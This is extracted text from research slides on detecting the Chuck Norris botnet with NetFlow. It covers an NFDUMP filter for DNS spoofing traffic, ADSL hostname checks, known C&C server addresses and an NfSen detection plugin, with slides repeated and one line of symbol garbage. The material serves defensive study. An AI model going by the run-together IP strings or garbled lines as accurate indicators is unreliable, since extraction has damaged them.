3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
